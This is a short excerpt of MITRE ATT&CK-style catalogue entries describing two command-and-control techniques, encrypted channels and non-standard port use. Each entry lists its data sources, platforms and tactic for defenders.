Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre